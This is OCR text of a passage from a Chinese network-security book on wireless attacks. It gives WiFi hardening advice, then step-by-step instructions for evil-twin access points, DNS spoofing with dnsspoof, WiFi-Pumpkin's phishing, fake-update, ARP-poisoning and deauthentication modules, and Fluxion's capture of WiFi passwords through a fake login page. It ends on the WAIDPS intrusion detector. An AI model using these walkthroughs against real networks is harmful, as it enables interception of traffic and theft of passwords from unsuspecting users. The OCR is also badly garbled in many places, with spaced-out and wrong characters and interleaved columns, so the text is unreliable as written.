更 进一步 ， 由 于 黑客 的 攻击 系统 与 被 
钓鱼 的 终端 建立 了 连接 ， 黑 客 可 以 寻找 可 
利用 的 系统 漏洞 ， 并 截获 终端 的 DNS/URL 
请 求 ， 返 回 攻 击 代 码 ， 给 终端 植 入 木马 ， 
达到 最 终 控 制 用 户 终 端的 目的 。 此 时 ， 连 
接 在 终端 的 设备 可 能 被 黑客 完全 控制 ， 致 
使 危害 进一步 扩大 。 
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9.1.3 ”无线 网 络 安全 建议 


针对 当前 无 线 网 络 的 安全 问题 ， 下 面 吕 久 


给 出 一 些 无 线 网 络 安全 的 建议 : 

(1) 不 要 随意 接 入 免费 WiFi 设备 ， 这 
种 情况 下 用 户 的 所 有 个 人 信息 ， 包 括 账 号 
密码 直接 可 以 被 拦截 并 窃取 。 

(2) 计算 机 或 者 手机 尽量 安装 安全 软 
件 ， 这 样 可 以 最 大 程度 减低 安全 风险 。 

(3) 修改 无 线路 由 器 默认 管理 账户 
不 要 使 用 admin 或 root 等 明显 字眼 。 

(4) 设置 无 线路 由 器 的 加 密 方式 为 
WPA/WPA2。 因 为 如 果 是 WEP 加 密 方 式 ， 
无 论 密码 多 长 ， 都 会 很 容易 被 破解 。 

(5) 设置 安全 强度 比较 大 的 无 线 WiFi 
密码 ， 最 好 包含 数字 、 字 母 、 大 小 写 、 特 
殊 字 符 等 ， 并 且 需 要 10 位 以 上 的 组 合 ， 例 
如 W@Xwod@#…。 

(6) 开启 MAC 地 址 过 滤 功 能 ， 只 绑 定 
自己 的 手机 、 计 算 机 、 平 板 计算 机 等 ， 如 
果 是 陌生 人 想 要 加 入 自己 的 无 线路 由 器 
需要 授权 后 ， 才 可 以 连接 。 

(7) 开启 家 长 控制 功能 ， 只 允许 本 地 
主机 的 MAC 地 址 管理 无 线路 由 器 。 

(8) 关闭 DHCP 服务 。 这 样 即便 密码 
泄露 ， 大 部 分 的 黑客 也 无 法 获取 了 他 地址 。 

(9) 关闭 WPS 功能 。 这 个 非常 重要 ， 
因为 当前 大 部 分 的 密码 都 是 黑客 通过 WPS 
漏洞 ， 找 出 PIN 码 来 暴力 破解 的 。 由 于 这 
个 漏洞 ， 无 论 用 户 的 无 线 密 码 有 多 长 多 复 
杂 ， 通 过 PIN 码 都 可 以 破解 。 

(10) 关闭 UPnP， 对 于 那些 无 用 的 服 
务 ， 建 议 用 户 直接 关 掉 。 

(11) 关闭 无 线 中 继 /桥接 功能 (WDS)。 
如 果 发 现 被 无 故 开 启 ， 说 明 这 人 台 路 由 器 很 
有 可 能 已 经 被 黑客 控制 了 。 

(12) 关闭 SSID 广播 ， 关 闭 之 后 ， 大 
部 分 人 会 搜索 不 到 路 由 器 设备 ， 这 样 就 可 
以 自己 独 享 网 络 了 这 在 一 定 程度 上 起 到 了 
隐身 作用 。 
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(13) 开启 防 DDoS 功 能 。 这 是 因为 黑 
客 会 通过 DDoS 流量 进行 攻击 ，10s 左 右 ， 用 
户 的 路 由 器 就 会 自动 将 大 部 分 人 踢 下 线 ， 
还 会 出 现 拌 动 状 态 。 

(14) 开启 用 户 隔离 功能 。 这 样 即 便 
密码 被 破解 ， 黑 客 也 没 法 搜索 到 设备 ， 这 
是 因为 黑客 与 用 户 不 在 同一 个 局 域 网 内 。 
这 对 保护 局 域 网 的 安全 非常 有 用 。 

(15) 采用 增强 认证 。 采 用 8021x 或 者 
Web 认 证 来 进行 账户 和 密码 登录 ， 这 在 一 定 
程度 上 提高 了 无 线 网 络 的 安全 性 。 


手动 创建 AP 


对 于 虚拟 AP 的 创建 ， 用 户 可 以 采用 手 
动 来 创建 ， 下 面 介绍 在 Windows 与 Linux 两 
种 系统 下 手动 创建 AP 的 方法 。 


有 浊 9.2.1 ”在 Windows10 系 统 下 创建 AP 


L Windows10 系 统 自 带 了 设置 网 络 共享 
的 功能 ， 可 以 通过 以 下 步骤 设置 一 个 虚拟 
AP。 具 体操 作 步 又 如 下 : 

fsep 贺 右 去 桌面 上 的 “开始 ”按钮 ， 在 弹出 
的 菜单 列表 中 选择 “运行 ”菜单 命令 ， 如 
下 图 所 示 。 


9.2 


step 图 打开 “运行 ”对 话 框 ， 在 其 中 输入 
cmd 命 令 ， 单 击 “ 确 定 ” 按 钮 ， 如 下 图 
所 示 。 


司 j)。 windows 检 恨 托 你 所 给 入 的 名 称 ， 为 你 打开 栓 应 的 得 序 
二。 文人 夫 、 文 或 Internet 资源 . 


打开 (O) 
四 ”合用 告 理 权 限 创 建 此 任务 。 


[step 图 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
入 netsh wlan show drivers 命 令 ， 检 查 无 线 网 
卡 是 否 支持 AP 功能 ， 如 果 有 “支持 的 承载 
网 络 : 是 ”信息 ， 证 明 具 有 AP 功能 ， 如 下 
图 所 示 。 


浏览 (B)… 


Estee 加 使 用 netsh wlan set hostednetwork 
mode=allow ssid=WiFi key=12345678 命 令 
创建 一 个 无 线 AP， 该 命令 用 于 创建 一 个 名 
称 为 WiFi、 连 接 密码 为 12345678 的 无 线 网 
络 ， 如 下 图 所 示 。 


所 示 。 
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step 国 使 用 netsh wlan start hostednetwork 命 令 ， 


启用 创建 好 的 无 线 网 络 ， 如 下 图 所 示 。 


start hostednetwork 


Step 图 单 击 桌面 上 的 “开始 ”按钮 ， 在 弹出 的 菜单 列表 中 单 击 “ 设 置 ”按钮 ， 如 下 图 


@ Cortana (小 娜 ) 


[step 国 打开 “设置 ”对 话 框 ， 在 其 中 选择 
“网 络 和 Intermet” 选 项 ， 如 下 图 所 示 。 


显示 器 、 雇 痛 、 通 知 、 电源 至 牙 、 打 印 机 、 饼 标 
网 络 和 Internet 个 性 化 

@ WLAN、 飞 行 模式 、VPN 4 背景 、 钠 屏 、 颜 色 

三 gm 内 4r 

一 部 载 、 默 从 应 用 、 可 选 功能 你 的 帐户 、 电 子 邮 件 、 同 步 设 


置 、 工作 、 其 他 人 员 


(QQ 时 间 和 语言 游戏 
A 字 灌区 直 .日期 ® 廊 0 癸 捕获、 广播 、 竺 戏 借 式 


[se 图 打开 “网 络 状态 ”对 话 框 ， 单 击 左 下 
方 的 “网 络 和 共享 中 心 ” 超 链接 ， 如 下 图 
所 示 。 
i 
企 诊断 并 解决 网 络 问题 
查看 网 络 属性 


Windows 防火 墙 


网 络 和 共享 中 心 


网 络 重 赤 


打开 “网 络 和 共享 中 心 ” 对 话 框 ， 单 
击 左 上 方 的 “更 改 适配器 设置 ” 超 链 接 ， 
如 下 图 所 示 。 


控制 面板 主页 

更 改 适配器 设置 
更 改 高 级 共享 i 
媒体 流 式 处 理 选 项 


step 可 打开 “网 络 连接 ”对 话 框 ， 在 其 中 可 
以 看 到 多 出 来 的 “本 地 连接 *3” 图 标 ， 如 
下 图 所 示 。 


第 9 章 无 线 网 络 中 的 虚拟 AP 技 术 = 


| 有 Ce 有 wy 


| ee* 
< Be 用 Xo go211n use wireless LAN card 


一 以 大 网 2 
A 网 次 共享 的 
Reahek pcle GBE Family Contr 


| 


0 Microsoft Hosted Nework Vir 


[step 图 选择 接 入 外 网 的 网 络 图 标 ， 这 里 以 
“以 太 网 2” 有 线 网 络 为 例 演示 ， 选 中 以 太 
网 2 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “ 属 
性 ”菜单 命令 ， 如 下 图 所 示 。 

四 村 有 


状态 (U) 
育 新 (1) 


加 析 扩 (6) 


创建 快 于 方式 (S) 
9 Be 
罗 至 宇和 (M) 


四 届 E(R) 局 
step 图 打开 “属性 ”对 话 框 ， 切 换 到 “ 共 
享 ” 选项 卡 ， 在 “家 庭 网 络 连接 ”下 拉 列 
表 中 找到 “本 地 连接 *3” 并 选中 ， 如 下 图 
所 示 。 


VirtualBox Host-Only Network 
VirtualBox Host-Only Network #2 
VMware Network Adapter VMnet! 


VMware Network Adapter VMnet8 


[step 图 选择 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 这 
样 便 可 以 创建 一 个 虚拟 AP， 如 下 图 所 示 。 


回 各 其 他 网 褒 用 广 控制 或 芝 用 共 训 的 Internet 连接 (0) 


[se | 


EE 
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s 旬 9.2.2 ”在 Kali Linux 系 统 下 创建 AP 


: 虚拟 AP 最 直接 的 方法 就 是 手动 虚拟 
AP 地 址 ， 手 动 配置 虚拟 AP 的 具体 操作 步 
又 如 下 : 
[step 图 通过 airbase-ng -c 1 -e Test-002 
wlan0mon 命 令 ， 便 可 以 虚拟 一 个 AP， 如 下 
图 所 示 。 


root@kali:-# airbase-ng -c 1 -e Test-662 wLan6mon 
64:55:49 


Created tap interface at9 

Trying to set MTU on at9 to 1500 

Trying to set MTU on wlangnon to 1869 

64:55:49 Access Point with 3SSID E8:4E:06:28:AE:46 started. 


step 园 通过 ifconfig -a 命令 可 以 看 到 多 出 一 块 
at0 的 网 卡 ， 如 下 图 所 示 。 


Tootekatis- ifconfig -a 
latO: fLagsn4098<BROADCAST,MULTICAST> mtu 1569 
ether e8:4e:06:28:ae:46 txqueuelen 1999 
RX packets 8 bytes 9 (9.9 B) 
RX errors @ dropped 9 overruns 9 frane 9 
TX packets 9 bytes 3 (0.0 6) 
TX errors 9 dropped 9 overruns 9 carrier 0 


(Ethernet) 


collisions 9 


step 图 通过 airodump-ng wlan0mon 命 令 监 
听 附 近 AP， 可 以 看 到 已 经 有 Test-002 这 样 
一 个 AP， 并 且 此 时 处 于 OPN 状 态 ， 如 下 图 
所 示 。 


本 TIT Elopsed: 69 1 2010-10-20 05:62 


55ID PuR Beacens woata, 0/s CH Ma ENC CIPHER AUTH E55ID 
06+88:5E:0A118:91 -53 日 0 1 139 opW 旧 站 于 电 
E4168:A3:7C+B1:B2 36 9 a 0 6 Sae. OPN CNC 
E4168:A3:7C:B1:B9 -37 1 0 6 Se. WpA2 CMp WOT CRCC 
5 9 4 9 56 -1 OPN <length: 0> 
1 2 1 8。 6 485 WPA2 cchp PSK 千 蔡 科技 
“35 1 9 6 S4e, OPN A 
ns a 0 5 54 OPN Test-002 
5 2 9 0 6 405 OPW TPGuest 6073 
2 4 日 日 1 199 wph2 cmp Psk Test-00l 


侈 提示 : 可 以 使 用 airbase-ng -a < 真实 AP- 
MAC 地 址 > --essid < 真实 AP 的 名 称 > wlan- 
0mon 命 令 ， 完 全 模仿 一 个 真实 AP， 此 时 进 
行 监听 便 不 能 区 分 真实 AP 与 伪 AP， 如 果 伪 
AP 再 增 大 发 射频 率 便 会 覆盖 真实 AP。 


step 轩 使 用 apt-get install bridge-utils 命 令 ， 
安装 一 个 网 桥 工具 ， 如 下 图 所 示 。 


TAU LT pte LnSTAUL TTA-UTITS 
在 读 吧 钦 件 包 列表 ..， 完 成 


正在 恋 取 状态 信息 ..， 况 蕊 
列 软件 包 是 自动 安装 的 并 且 现 在 不 村 要 了 

tibx265-168 python-backports.sst-match-hostname python-beautifutsoup 
ruby-terninal -table ruby-unicode-display-width 

用 'apt_autoremove' 来 盎 医 它 ( 它 们 )。 

列 【 新 ] 软件 包 特 被 安 闭 

bridge-utits 

级 了 9 个 软件 包 ， 新 安装 了 1 个 软件 包 ,要 印 并 9 个 钦 件 包 ,有 9 个 软件 包 未 被 升 级 。 


[step 园 使 用 brctl addbr bridge 命 令 ， 添 加 一 
个 桥接 接口 ， 并 使 用 ifconfig -a 命令 查看 
接口 ， 如 下 图 所 示 ， 添 加 一 个 新 的 桥接 
接口 。 
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[raaraRaris= ITCONTIg -5 
lbridge: flags=4698<BROADCAST, MULTICAST> mtu 1566 


ether fa:ea:10:81:db:11 txqueuelen 1996 (Ethernet) 
RX packets 8 bytes 3 6.9 B) 
RX errors@ dropped 0 overruns 9 frane 8 


TX packets 9 bytes 9 16.9 B) 
TX errors 9 dropped 9 overruns 6 carrier 9 collisions 6 


[step 图 执行 brctl addif bridge eth0 命 令 和 brct 
addif bridge at0 命 令 ， 将 eth0 网 卡 和 at0 网 
卡 加 入 到 桥接 中 ， 分 别 将 其 IP 地 址 配置 为 
0.0.0.0 并 启动 起 来 ， 如 下 图 所 示 。 


# brctl addif bridge ethe 
root@kali:-# brctl addif bridge at9 

root@kali:-# ifconfig ethe 09.06.90.0 up 
root@kali:-# ifconfig at6 6.0.0.0 up 


执行 ifconfig bridge <ip 地 址 > up 命 
令 ， 将 桥接 网 口 启动 ， 如 下 图 所 示 ， 这 里 
的 人 P 地 址 根据 自己 的 网 络 进行 设置 ， 设 置 的 
是 192.168.157.100。 


FearaRRGE-9 ITconfig 
at0: flags=4163<UP, BROADCAST,RUNNING, MULTICAST> mtu 1500 

Inets feae: :eade:6ff;fe28:ae46 prefixlen 64 scopeid Ox26<\ink> 
erher eB:4:06:28:ne;46 txqucuclen 1968 (Ethernet) 

RX packets 0 bytes 0 (0.0 B) 

RX errors 9 dropped 6 overruns 9 frame © 

TX packets 58 bytes 13118 (12.8 KiB) 

Tk errors 9 dropped 0 overruns @ carrier 日 collisions 日 


bridge: flags=4163<UP,BROADCAST, RUNNING, MULTICAST> mtu 1568 
inet 192. 158.157.189 netmask 255.255.255.9 brondcnst 192.168,157.255 
inet6 fea0;:20c:29tt,fe39:f29c prefixlen 64 scopeid gx29<Link> 

29:39:f2:9c txqueuelen 1688 (Ethernet) 

5 48 bytes 11434 (11.1 KiB) 

Rx errors 8 dropped 9 overruns 9 frane © 

TX packets 10 bytes 796 (796.0 B) 

TX errors 日 dropped © overruns © carrier © collisions © 


使 用 route add -net 0.0.0.0 netmask 
0.0.0.0 gw 192.168.1.1 命 令 ， 主 机 添加 一 个 
网 关 ， 并 使 用 netstat -nr 命令 查看 网 关 添 加 
情况 ， 如 下 图 所 示 。 


rota WEESTGE NT 
Kernel IP routing table 


Gateway Gennask Flags HSS Window irtt Iface 
192.168.1.1 0.6.0.8 ve on 9 etho 
192.168.1.1 。 9.6.6.8 ve 00 日 ethg 

19- 1.9 89.0.0.8 255,255.255.8 J 日 日 日 erhg 

92.168.157.0 8.0.0.9 255.255.235.8 _U 日 日 bridge 


[step 图 使 用 echo 1 > /proc/sys/net/ipv4/ip_ 
forward 命 令 ， 添 加 IP 地 址 转发 功能 ， 如 下 
图 所 示 。 

root@kali: -~# 
Pe echo 1 > /proc/sys/net/ipv4/ip forward 


root@kali:-# cat /proc/sys/net/ipv4/ip forward 
1 


[ep 加 新 建 一 个 文件 ， 文 件 格式 为 : IP 地 址 
< 空格 > 域名 ， 如 下 图 所 示 。 


文件 (F) 编辑 (E) 查看 (V) 搜索 (5) 
127.9.9.1 www.baidu.com 


cat /proc/sys/net/ipv4/ip _ forward 


step 辆 使 用 dnsspoof -i bridge -f hosts 命 令 ， 


将 文件 中 的 了 域名 对 应 关系 进行 解析 ， 如 下 
图 所 示 。 下 图 中 可 以 看 到 ， 在 本 机 开启 了 
53 端 口 进 行 DNS 解 析 ， 而 解析 的 规则 则 是 
按照 之 前 做 好 的 配置 文件 来 进行 。 


Ere # dn5spoof -1 bridge -fF hosts 


lansspoof: listening on bridge [udp dst port 53 and not src 192 168.157.180] 


9.3 ”使 用 WiFi-Pumpkin 虚 
拟 AP 


WiFi-Pumpkin 是 一 款 图 形 化 工具 ， 它 
并 不 是 Kali 自 带 的 工具 ， 通 过 它 可 以 轻松 实 
现 虚 拟 AP、 移 动 WiFi 等 功能 。 


9.3.1 安装 WiFi-Pumpkin 


由 于 WiFi-Pumpkin 是 扩展 工具 ， 因 此 

需要 下 载 。 下 载 并 安装 WiFi-Pumpkin 工 具 
的 操作 步骤 如 下 : 
使 用 git clone https://github.com/ 
PO0cL4bs/WiFi-Pumpkin.git 命 令 ， 从 github 上 
复制 代码 到 本 机 ， 或 者 直接 从 github 上 下 载 
安装 包 ， 如 下 图 所 示 。 


me 


| 
Clone with HTTPS @ 


Use Git or checkout with SVN using the web URL. 


https://github.com/pecL4bs/WiFi-Pumpkin. 让 


Open in Desktop Download ZIP 


step 园 单 击 Download ZIP 按 钮 ， 可 以 下 载 安 
装 包 。 下 图 为 下 载 后 的 安装 包 。 


WiFi-Pumpkin- 
master.zip 


WiFi-Pumpkin- 
master 


step 国 解压 安装 包 后 查看 安装 包 文件 ， 如 
下 图 所 示 。 至 此 便 完 成 了 WiFi-Pumpkin 的 
下 载 5 
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FOOTERB LI: -7 Do onds7WIFI- PuNpRINn-master ts 
[CHANGELOG installer.sh modules 
[CONTRIBUTING.md ISSUE TEMPLATE.md plugins 

[ore LICENSE README ,md 

Hocs logs requirements ,txt 
Econs make_deb, sh tenplates 


wifi-pumpkin 
wifi-punpkin. desktol 
vifi-punpkin.py 


step 加 使 用 ./installer.sh --install 命 令 安 装 软 


bsage: ./installer.sh --install | --uninstall 
证 中 :1 http://nirrors.neusoft.edu.cn/kali kali-rolling InRetease 回 ， 
正在 读 取 软 件 包 列表 ... 完成 F 
正在 读 妈 软件 包 列 表 ... 完成 

正在 分 析 软 件 包 的 依 未 关系 树 

正在 读 取 状 态 信息 .. .完成 

LibfTi-dev 已 经 是 最 新 版 (3.2.1-8)。 
libffi-dev 已 设置 为 手动 安装 。 
python-pip 已 经 是 最 新 版 (9.8 1-2.3)。 
bython-pip 已 设置 为 手动 安装 。 


安装 过 程 WiFi-Pumpkin 会 自动 查看 依 
赖 包 ， 如 果 存 在 缺少 的 依赖 包 ， 会 自动 下 
载 并 安装 相关 的 依赖 包 ， 如 下 图 所 示 。 


阿公 同时 朗 闭 下 列 软件 
girl1.2-harfbuzz-9.9 icu-devtools libglib2.9-dev libglib2.0-dev-bin 
Libgraphltez-dev Libharfbuzz-dev libharfbuzz-gobjecte Libicu-dev 
1ibicu-Le-hb-dev Libpcre16-3 Libpcre3-dev Libpcre32-3 libpcrecppev: 
pkg-config 

峙 议 实 黎 
libglib2.0-doc libgraphite2-utils icu-doc libssl-doc 

下 列 【 新 】 软 件 包 将 被 安装 
girl.2-harfbuzz-9.B icu-devtools libglib2.0-dev tibgLib2.6-dev-bin 
libgraphite2-dev Libharfbuzz-dev libharfbuzz-gobjecte Libicu-dev 
1ibicu-le-hb-dev Libpcre16-3 Libpcre3-dev Libpcre32-3 Libpcrecppev: 
tibsst-dev libxnl2-dev Libxsttl-dev pkg-config 2l1b19-dev 


安装 完成 后 的 结果 如 下 图 所 示 ， 这 里 
也 给 出 了 相应 的 提示 。 


ng dependencies 
-[+] hostapd Installed 


chec 


[=] Install WiFi-Pumpkin 

[x] binary::/usr/bin/ 

[x*] wifi-pumpkin installed with success 
[vv] execute sudo wifi-pumpkin in terminal 
[+] pecL4bs Team CopyRight 2915-2617 

[+] Enjoy 


9.3.2 ”开始 虚拟 AP 


WiFi-Pumpkin 配 置 完成 后 ， 下 面 就 可 
以 虚拟 AP 了 。 有 具体 的 操作 步骤 如 下 : 
[Sep 加 单 去 Settings 选 项 卡 可 以 切换 到 设置 
页 面 ， 如 果 创建 一 个 虚拟 AP 可 以 通过 设置 
Access Point 来 完成 ， 填 入 SSID 的 名 称 、 
BSSID 的 MAC 地 址 (这 里 可 以 随机 也 可 
以 自行 设置 ) 、AP 信 道 、 无 线 网 卡 〈( 可 
以 通过 Refresh 按 钮 来 刷新 获取 ) ， 如 下 图 
所 示 。 
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[step 图 下方 可 以 设置 DHCP 服 务 ， 分 配 IP 
地 址 段 、 网 关 等 选项 ， 设 置 完成 后 可 单 击 ”9.3.3 WiFi-Pumpkin 的 其 他 工具 


下 方 的 save settings 按 钮 ， 如 下 图 所 示 。 在 Tools 菜 单列 表 下 有 一 个 ActiveDrift- 


Net 工 具 。 用 于 查看 连接 设备 传输 过 程 中 的 
图 片 信息 ， 如 下 图 所 示 。 


® 
a : 


此 时 的 WiFi-Pumpkin 是 一 个 未 运行 状 
态 ， 如 下 图 所 示 。 


下 图 为 ActiveDriftNet 抓 取 的 图 片 


driftnet 


当 所 有 都 设置 完成 后 ， 直 接 单 。 另外 ， 在 Image-Cap 中 也 可 以 抓 取 图 片 


击 start 按 钮 启动 WiFi-Pumpki， 如 下 图 信息 ， 如 下 图 所 示 


ES 
Et 


/ 


[step 图 实现 数据 监听 ， 此 时 WiFi 列 表 中 会 
多 出 一 个 刚才 设置 的 无 线 ESSID， 使 用 手 
机 接 入 ， 浏 览 网 页 的 数据 可 以 通过 WiFi- 
Pumpkin 查 看 ， 如 下 图 所 示 ， 这 样 便 可 以 抓 
取 流 经 AP 的 所 有 数据 包 。 


Server 菜 单 中 有 两 个 选项 ， 一 个 是 


Phishing Manager， 一 个 是 Windows Up- 
' : date， 如 下 图 所 示 。 
[step 国 如 果 需 要 使 用 移动 WiFi， 在 Setting 界 面 
中 选中 Enable Wireless Security 选 项 。 这 里 
可 以 选择 加 密 方式 以 及 共享 密 钥 ， 如 下 图 
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其 中 Phishing Manager 可 以 用 于 模拟 e@ WiFi deauthentication: 这 里 可 以 选 
个 网 页 ， 可 以 从 这 里 虚假 页 面 达 到 钓鱼 效 择 一 个 目标 AP 通过 发 送 断 开 连 接 请 
果 ， 如 下 图 所 示 。 求 ， 中 断 STA 与 AP 的 连接 ， 从 而 抓 


Phishing Manager S00 


取 握 手 信 息 ， 如 下 图 所 示 。 


Wireless DeauthenticationAttack © © 四 


Windows Update 则 模拟 一 个 类 似 Win- 
dows 更 新 程序 或 Java 更 新 程序 ， 向 客户 端 发 
送 数据 包 ， 如 下 图 所 示 。 


Windows Update Attack Generator @ © ©@ 


e WiFi Probe Request: 用 于 发 现 AP， 
通过 该 模块 可 以 扫描 附近 的 AP， 如 
下 图 所 示 。 


ProbeRequestwifiMontor © ©O@ 


Modules 菜 单 中 包括 五 个 模块 ， 它 们 分 
别 是 WiFi deauthentication 〈 用 户 断 开 客 户 端 
与 AP 连接 ) 、WiFi Probe Request (用 于 发 
现 AP) 、DHCP Starvation( 实 现 DHCP 饥 饿 
攻击 ) 、ARP Poisoner〈 实 现 ARP 攻 击 ) 以 e@ DHCP Starvation， 用 于 实现 DHCP 饥 
及 DNS spoofer (实现 DNS 坎 骗 ) ， 如 下 图 饿 攻击 ， 一 旦 启动 迅速 占 满 DHCP 
所 示 。 所 分 配 的 IP， 如 下 图 所 示 。 


Dhcp Starvation Attack e000 
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e ARP Poisoner: 可 以 扫描 网 段 中 
的 客户 机 ， 通 过 模拟 实现 ARP 攻 
击 ， 如 下 图 所 示 。 


ARP Poisoner 


O00 


e@ DNS Spoofer: 可 以 实现 DNS 欺 骗 ， 
其 中 可 以 设置 需要 欺骗 的 域名 ， 
配合 Phishing Manager 与 Windows 
Update 构 建 虚假 页 面 或 者 更 新 程 
序 ， 如 下 图 所 示 。 


DNS Spoofer 


加 
a 


9.4 使 用 Fluxion 虚 拟 AP 


Fluxion 不 是 Kali 自 带 的 工具 ， 通 过 它 可 
以 虚拟 一 个 AP， 以 便 诱 惑 客户 端 输入 登录 


密码 ， 从 而 获取 无 线 密码 。 使 用 Fluxion 工 
具 虚 拟 AP 的 操作 步骤 如 下 : 

Estee 回 使 用 git clone https://github.com/wi-fi- 
analyzer/fluxion.git 命 令 ， 从 github 上 复制 代 
码 到 本 机 ， 或 者 直接 从 github 上 下 载 安装 


包 ， 如 下 图 所 示 。 


Clone with HTTPS ® 
Use Git or checkout with SVN using the web URL. 


https://Eithub.com/wi-fi-analyzer/fluxiol 


良 


Open in Desktop Download ZIP 
解压 安装 包 ， 查 看 安装 目录 文件 ， 如 
下 图 所 示 。 
FootBKRaUI:-7DoWnLOadS7FTLUXIO 


docs install lib 
fluxion.sh language locale 


os siteinstaller.p' 
README .md sites 


[stp 图 执行 “fluxion.s”h 脚 本 ， 检 查 数据 
依赖 包 信 息 ， 如 下 图 所 示 。 


[ 
[ FLUXION 2 < Fluxion Is The Future > 
[ 
[ 


pircrack-ng 
pireplay-ng 
pirmon-ng.. 


dhcpd 
hostapd. 
iiwconfig 
Nighttpd. . 
nacchanger. 
mdk3.... 
pmap.... 
php-cgi. 
pyrit... 
python. . 
hnzip... 
kterm. . 
ppensst 
rfkill.. 
strings. 
fuser- 


step 国 声 换 到 install 列 表 中 ， 执 行 ./fluxion.s 
命令 ， 安 装 Fluxion 软 件 ， 如 下 图 所 示 。 


OK 


Aircrack-ng 
Aireplay-ng.. 
Airodump-ng 
Bully 


Lighttpd 
Macchanger 
Mdk3 
Nmap 
Openssl 
Php-cgi 
Pyrit 
Python 
rfkill 
Unzip 
Xterm 
strings 
fuser 


[step 图 再 次 执行 “./fluxion.s”h 脚 本 ， 

主 界面 ， 在 这 里 可 以 选择 语言 ， 如 下 图 所 
示 ， 由 于 该 软件 字体 颜色 偏 白色 所 以 更 换 
为 黑 底 白字 。 


FLUXION 2 < FLuxion Is The Future > 


2] Select your language 


[1] English 
[2] German 
[3] Romanian 
[4] 

[5] 

[6] Chinese 
[7] Italian 
[8] ch 
[9] k 
[19] French 
[11] Slovenian 


G@fLuxion]-[~)] 

择 1 使 用 英语 ， 进 入 信道 选择 ， 如 
道 ， 如 果 已 知 目标 
选择 2 指定 ， 不 然 请 选择 
pk 搜索 过 程 中 会 打开 一 个 
口 ， 当 扫描 到 所 需 的 WiFi 信 号 ， 按 Ctrl + C 
键 停止 扫描 ， 建 议 扫描 至 少 30s 以 上 。 


step 四 选 


通信 人 


< FLuxion Is The Future > 


[3] Back 


@fluxion] -[~] 
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me 投 


所 示 ， 通 过 数字 


索 至 fe 目 如 下 图 
选择 目标 AP。 


CHAN 。 SECU PWR ESSID 


76:AF:6A:69: 
et . 
2E: 


[step 图 选择 完 AP 后 可 以 进入 虚拟 AP 界 面 ， 
eA 这 里 推荐 使 用 第 1 选项 。 


= Test-B@1 / WPA2 


F:08 (TP-LINK TECHNOLOGIES 50,,LTD， 


ded) 
r connection) 
{31 Bock 


efUuxion] - [~] 


wg 提示 虚拟 AP 信 息 以 及 保存 文件 路 
径 ， 如 下 图 所 示 ， 可 以 直接 按 Enter 键 。 


= 1C:FA 68:01:2F:08 (TP-LINK TECHNOLOGIES CO.,LTD. 


Exanple: /root/Downloads/Fluxion-naster.cap) 


step 贺 抓 取 握 手 信 息 ， 如 下 图 所 示 。 使 用 第 
1 项 或 第 2 项 都 可 以 。 


[2] Handshake check 


[1] pyrit 
[2] aircrack-ng (Miss chance) 
[3] Back 


@fluxion]-[~] 轩 


step 回 选择 第 1 项 ， 
如 下 图 所 示 。 


[2] *Capture Handshake* 


会 启动 拒绝 请 求 页 面 ， 


[1] Deauth all 
[2] Deauth all [mdk3] 


[3] Deauth target 
[4] Rescan networks 
[5] Exit 


step 图 选择 第 1 项 ， 中 断 所 有 与 AP 连接 的 客 
户 端 ， 此 时 会 开启 另外 两 个 窗口 用 于 抓 取 
握手 信息 ， 如 下 图 所 示 。 
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这 里 会 要 求 创 建 一 个 Web 页 面 ， 如 下 
示 。 这 个 页 面 是 用 于 诱骗 客户 端 输 入 


Capturing data on channel --> 1 ooe 


[TP-LINK TECHNOLOGIES co- ,LTD 


Step 图 抓 取 到 握手 信息 后 ，Fluxion 界 面 如 下 
图 所 示 。 选 择 第 1 项 ， 检 查 握手 信息 。 


[2] *Capture Handshake* 


选择 伪造 页 面 的 语言 ， 如 下 图 所 示 。 


status handshake: 
[1] Check ha a nA 
[2] Back 0 :FA;68:61:2F;68 (TP-LINK TECHNOLOGIES co.，,LTD 
[3] Select another network 
[4]_Exit 
dll em 
(NEUTRA 
(NEUTRA 


[step 园 验证 通过 后 会 跳 转 到 创建 证 书 界面 ， 名 CAEUTRA 

如 下 图 所 示 。 选 择 第 1 项 创建 一 个 SSL 证 书 。 ni 

[Step 图 选择 语言 后 ，Fluxion 会 构建 一 个 虚拟 
AP 并 且 将 客户 端 连接 中 断 ， 语种 和? 下流 有 

3 eee for Le 密码 连接 的 ， 此 时 Fluxion 会 开启 多 个 窗口 


de 用 于 检测 用 户 接 入 状态 ， Pen 


Certificate invalid or not present, please choice 


step 转 此 时 手机 登 芝 会 驱 标 到 一 个 Web 页 面 提示 需要 输入 登录 密码 ， 如 下 图 所 示 。 这 个 密 
码 Fluxion 会 向 真实 的 AP 进 行 验证 ， 输 入 错误 会 提示 错误 ， 直 到 拿 到 真实 密码 。 
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在 攻击 时 ， 系 统 会 显示 于 屏幕 并 记录 在 日 


志 中 


出 错 了 : 您 输入 的 密码 错误 ! 


3 汪 


9.5.1 安装 WAIDPS 
"re" 安装 WAIDPS 系 统 是 使 用 该 系统 进行 无 


WW 和 iGOWPAE EE: 线 入 侵 检测 的 前 提 。 安 装 WAIDPS 的 操作 步 
又 如 下 : 


step 国 打开 https://github.com/SYWorks/ 


折 示 waidps 链 接 ， 单 击 Clone or download 按 钮 ， 
和 如 下 图 所 示 。 


Wifi Information age EE 
Find file 
= 2 Na 


~ 


[00:00:00] 1/0 ke tested (136.56 k/s) 
et Clone with HTTPS @ 
Time left: 


单 击 Download ZIP 按 钮 下 载 压缩 包 
a 有 三 个 文件 ， 如 下 图 所 示 。 


9.5 “无 线 网 络 入 侵 检 测 系统 


WAIDPS 是 一 款 由 Python 编写 的 无 线 
入 侵 检 测 工具 ， 基 于 Linux 平 台 并 且 完 全 
开源 。 它 可 以 探测 包括 WEP/WPA/WPS [Sea 国 切换 到 文件 目录 ， 在 终端 执行 ./ 
在 内 的 无 线 入 侵 与 攻击 方式 ， 并 可 以 收 ”waidpspy 命 令 便 可 以 安装 WAIDPS， 首 次 运 
集 WiFi 相 关 的 所 有 信息 ， 当 无 线 网 络 中 存 ， 行 会 下 载 一 些 必 要 的 文件 ， 如 下 图 所 示 。 


LICENSE README.md waidps.py 


File Not found in /.SYwWorks/WAIDPS/waidps .py 
Copy file from [/root/Downloads/waidps-master/waidps-master/waidps.py] to [/.SYworks/WAIDPS/waidps.py ] 


You can now run from by doing the following : 
cd /.SYwWorks/WAIDPS/ 


./waidps.py 


Press Any Key To Continue 


mac-oui.db 


master/mac-oui.db 


